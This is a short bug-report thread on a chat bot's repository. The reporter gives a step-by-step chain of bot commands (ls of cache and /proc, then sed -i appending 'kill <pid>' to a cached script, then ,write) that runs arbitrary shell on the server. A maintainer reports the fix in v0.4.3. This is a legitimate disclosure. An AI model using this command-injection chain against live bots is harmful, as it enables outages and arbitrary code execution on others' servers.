### ISSUE TITLE
Arbitrary shell script execution in current damebot

### ISSUE THREAD

**Issue by benpigchu** [nightingu/damebot#9]
Send the following message to the bot
```
,ls cache
```
We can get the script used by the `,write` command

Send the following message to the bot
```
,ls /proc
```
We can get the pid of the bot server

Then, send the following message to the bot
```
,sed -i '$a kill <pid>' cache/<filename>
```
We can change the behavior of the `,write` command

And finally, send the following message to the bot
```
,write goodbye bot 
```
We kill the bot with the `,write` command

By changing the script in the `sed` step, we can execute any shell script

**Comment by Ledenel** [comment]
fixed in v0.4.3.
